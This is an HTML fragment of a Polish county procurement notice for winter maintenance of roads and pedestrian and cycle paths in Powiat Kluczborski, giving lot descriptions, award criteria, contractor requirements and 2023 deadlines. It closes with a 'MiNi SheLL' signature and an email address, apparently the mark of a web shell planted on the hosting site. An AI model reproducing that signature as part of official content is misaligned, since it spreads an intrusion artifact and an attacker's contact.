nr 4 oraz Projektowane Postanowienia Umowy - zał. nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">63000000-9 - Usługi dodatkowe i pomocnicze w zakresie transportu, usługi biur podróży</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-11-01 do 2024-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował<br/>określonymi w SWZ warunkami, kryteriami oceny ofert oraz przepisami ustawy Pzp. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczbę punktów stanowiących sumę przyznanych w ramach każdego z podanych w SWZ kryteriów oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, który spełni wszystkie postawione w Specyfikacji (SWZ) wraz z załącznikami warunki, spełni wymogi ustawy Pzp oraz otrzyma najwyższą liczbę punktów spośród ocenianych ofert, zgodnie z opisem Rozdz. XIX SWZ na podstawie określonych kryteriów oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Najkorzystniejsza oferta po zsumowaniu punktacji z powyższych kryteriów może uzyskać maksimum 100 punktów.<br/>Szczegółowy OPIS KRYTERIÓW OCENY OFERT WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT zawarto w Rozdziale XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia sprzętu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> &#34;Zadanie nr 4 - Świadczenie usług sprzętowo-transportowych w zakresie zimowego utrzymania jezdni dróg powiatowych na terenie Powiatu Kluczborskiego - rejon 4 (gmina WOŁCZYN) oraz zapewnienie placu do składowania mieszanki piaskowo-solnej&#34;<br/><br/>W ramach zadania nr 4 Wykonawca zapewni:<br/>•	co najmniej 1 pług do odśnieżania dróg zamontowany do pojazdu o masie całkowitej nie mniejszej niż 5 Mg i mocy nie mniejszej niż 120 KM;<br/>•	piaskarko-solarkę gotową do zwalczania śliskości wraz pojazdem,<br/>•	plac do składowania mieszanki piaskowo-solnej oraz zaplecze socjalne dla operatorów i kierowców,<br/>•	ładowarkę.<br/><br/>Zimowemu utrzymaniu w ramach zadań nr 4 podlegają jezdnie dróg powiatowych, obręby skrzyżowań z drogami powiatowymi i gminnymi, zatoki autobusowe, przejazdy kolejowe, jezdnie na mostach i wiaduktach oraz inne miejsca wskazane przez Zamawiającego.<br/><br/>Ze względu na specyfikę zamówienia, którego wielkość i zakres ściśle uzależniony jest od trudnej do przewidzenia intensywności sezonów zimowych, zakresy pracy pojazdów i sprzętu są szacunkowe. Ilości te mają charakter orientacyjny i posłużą do ustalenia ceny ofertowej, a w przypadku oferty najkorzystniejszej do określenia orientacyjnej wartości umowy. Rzeczywista ilość usług zleconych do wykonywania uzależniona będzie od bieżących potrzeb (intensywności sezonu zimowego), przy czym zgodnie z art. 433 pkt. 4 ustawy PZP, Zamawiający gwarantuje realizację umowy tj. zapłatę należnego wynagrodzenia bez względu na intensywność sezonu zimowego - co najmniej na poziomie poniesionych kosztów przez Wykonawcę za gotowość (dyspozycyjność) do świadczenia usług ZUD.<br/><br/>Zamawiający wymaga by usługi były wykonywane zgodnie ze standardami Zimowego Utrzymania Dróg oraz wymaganiami SWZ i wytycznymi Specyfikacji Technicznych stanowiących załącznik do SWZ. <br/><br/>Szczegółowy opis przedmiotu zamówienia oraz sposób jego realizacji został określony w SWZ wraz z załącznikami, a w szczególności w załącznikach: Specyfikacje Techniczna &#34;ST&#34; - Warunki realizacji usług - zał. nr 4 oraz Projektowane Postanowienia Umowy - zał. nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">63000000-9 - Usługi dodatkowe i pomocnicze w zakresie transportu, usługi biur podróży</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-11-01 do 2024-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował<br/>określonymi w SWZ warunkami, kryteriami oceny ofert oraz przepisami ustawy Pzp. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczbę punktów stanowiących sumę przyznanych w ramach każdego z podanych w SWZ kryteriów oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, który spełni wszystkie postawione w Specyfikacji (SWZ) wraz z załącznikami warunki, spełni wymogi ustawy Pzp oraz otrzyma najwyższą liczbę punktów spośród ocenianych ofert, zgodnie z opisem Rozdz. XIX SWZ na podstawie określonych kryteriów oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Najkorzystniejsza oferta po zsumowaniu punktacji z powyższych kryteriów może uzyskać maksimum 100 punktów.<br/>Szczegółowy OPIS KRYTERIÓW OCENY OFERT WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT zawarto w Rozdziale XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia sprzętu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> &#34;Zadanie nr 5 - Świadczenie usług sprzętowo-transportowych w zakresie zimowego utrzymania dróg dla pieszych i rowerów na terenie Powiatu Kluczborskiego - rejon 5 (POWIAT KLUCZBORSKI) oraz zapewnienie placu do składowania mieszanki piaskowo-solnej&#34;<br/><br/>W ramach zadania nr 5 Wykonawca zapewni:<br/>•	co najmniej 1 pług do odśnieżania dróg dla pieszych i rowerów zamontowany do pojazdu o masie całkowitej nie większej niż 3 Mg;<br/>•	piaskarko-solarkę gotową do zwalczania śliskości;<br/>•	plac do składowania mieszanki piaskowo-solnej oraz zaplecze socjalne dla operatorów i kierowców;<br/>•	zastosowany przez zamawiającego sprzęt musi spełniać warunki do pracy na drogach dla pieszych i rowerów;<br/>•	w obrębie przejść dla pieszych należy przewidzieć ręczne odśnieżanie i zwalczanie śliskości.<br/><br/>	Zimowemu utrzymaniu w ramach zadania nr 5 podlegają drogi dla pieszych (chodniki), drogi dla pieszych i rowerów, drogi dla rowerów (ścieżki rowerowe), dojścia do przejść dla pieszych po obu stronach jezdni oraz jezdnia w obrębie przejść dla pieszych. <br/><br/>Ze względu na specyfikę zamówienia, którego wielkość i zakres ściśle uzależniony jest od trudnej do przewidzenia intensywności sezonów zimowych, zakresy pracy pojazdów i sprzętu są szacunkowe. Ilości te mają charakter orientacyjny i posłużą do ustalenia ceny ofertowej, a w przypadku oferty najkorzystniejszej do określenia orientacyjnej wartości umowy. Rzeczywista ilość usług zleconych do wykonywania uzależniona będzie od bieżących potrzeb (intensywności sezonu zimowego), przy czym zgodnie z art. 433 pkt. 4 ustawy PZP, Zamawiający gwarantuje realizację umowy tj. zapłatę należnego wynagrodzenia bez względu na intensywność sezonu zimowego - co najmniej na poziomie poniesionych kosztów przez Wykonawcę za gotowość (dyspozycyjność) do świadczenia usług ZUD.<br/><br/>Zamawiający wymaga by usługi były wykonywane zgodnie ze standardami Zimowego Utrzymania Dróg oraz wymaganiami SWZ i wytycznymi Specyfikacji Technicznych stanowiących załącznik do SWZ. <br/><br/>Szczegółowy opis przedmiotu zamówienia oraz sposób jego realizacji został określony w SWZ wraz z załącznikami, a w szczególności w załącznikach: Specyfikacje Techniczna &#34;ST&#34; - Warunki realizacji usług - zał. nr 4 oraz Projektowane Postanowienia Umowy - zał. nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90630000-2 - Usługi usuwania oblodzeń</p> <p class="mb-0">63000000-9 - Usługi dodatkowe i pomocnicze w zakresie transportu, usługi biur podróży</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-11-01 do 2024-04-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował<br/>określonymi w SWZ warunkami, kryteriami oceny ofert oraz przepisami ustawy Pzp. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma najwyższą liczbę punktów stanowiących sumę przyznanych w ramach każdego z podanych w SWZ kryteriów oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, który spełni wszystkie postawione w Specyfikacji (SWZ) wraz z załącznikami warunki, spełni wymogi ustawy Pzp oraz otrzyma najwyższą liczbę punktów spośród ocenianych ofert, zgodnie z opisem Rozdz. XIX SWZ na podstawie określonych kryteriów oceny ofert. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Najkorzystniejsza oferta po zsumowaniu punktacji z powyższych kryteriów może uzyskać maksimum 100 punktów.<br/>Szczegółowy OPIS KRYTERIÓW OCENY OFERT WRAZ Z PODANIEM WAG TYCH KRYTERIÓW I SPOSOBU OCENY OFERT zawarto w Rozdziale XIX SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia sprzętu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, że na okres realizacji zamówienia - w ramach wybranego zadania nr 1; 2; 3; 4; 5 - dla każdego zadania oddzielnie, będą dysponować nw. pojazdami i sprzętem:<br/>W ramach zadań nr 1 – 4 wykonawca zapewni: <br/>• co najmniej 1 pług do odśnieżania dróg zamontowany do pojazdu o masie całkowitej nie mniejszej niż 5 Mg i mocy nie mniejszej niż 120 KM; <br/>• piaskarko-solarkę gotową do zwalczania śliskości wraz pojazdem, <br/>• ładowarkę. <br/>W ramach zadania nr 5 wykonawca zapewni: <br/>• co najmniej 1 pług do odśnieżania dróg dla pieszych i rowerów zamontowany do pojazdu o masie całkowitej nie większej niż 3 Mg; <br/>• piaskarko-solarkę gotową do zwalczania śliskości; <br/>(zastosowany przez zamawiającego sprzęt musi spełniać warunki do pracy na drogach dla pieszych i rowerów; w obrębie przejść dla pieszych należy przewidzieć ręczne odśnieżanie i zwalczanie śliskości). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">załącznik nr 3 do SWZ &#34;WYKAZ NIEZBĘDNEGO DO WYKONANIA ZAMÓWIENIA POTENCJAŁU TECHNICZNEGO (SPRZĘTU, POJAZDÓW)<br/>&#34; dla wybranego zadania nr 1; 2; 3; 4; 5</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Formularz ofertowy - zał. nr 1 do SWZ (OFERTA) wraz z załączeniem wypełnionego Formularza cenowego odpowiednio: zał. nr 1A do SWZ dla ZADANIA (CZĘŚCI) NR 1 i/lub 2 i/lub 3 i/lub 4 i/lub 5.<br/>2. Stosowne pełnomocnictwa m. in. do podpisania oferty, do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia itp. (jeśli dotyczy).<br/>3. Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu z art. 125 ust. 1<br/>4. Zobowiązanie Podmiotu trzeciego w przypadku polegania na zasobach podmiotu udostępniającego zasoby Wykonawcy (jeśli dotyczy).<br/>5. Dokumenty zawierające informacje stanowiące tajemnicę przedsiębiorstwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2.	Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VIII SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>4.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>5.	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego pełnomocnika). <br/>6.	Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>7.	W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art. 455 ustawy Pzp Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w przypadkach, rodzaju i zakresie szczegółowo wymienionych i opisanych w §14 Projektowanych Postanowień Umowy stanowiących załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-09-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Oferty należy składać wyłącznie poprzez Platformę zakupową Marketlanet Oneplace prowadzonego postępowania, pod adresem: https://powiatkluczborski.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-09-05 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-10-04</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Ofertę składa się na załączonym Formularzu Ofertowym (wg wzoru) – zgodnie z zał. nr 1 do SWZ wraz z załączeniem Formularza cenowego dla wybranego ZADANIA od 1 do 5. Ceny jednostkowe ujęte w Formularzu cenowym posłużą do obliczenia rzeczywistego wynagrodzenia Wykonawcy.

Creat By MiNi SheLL
Email: jattceo@gmail.com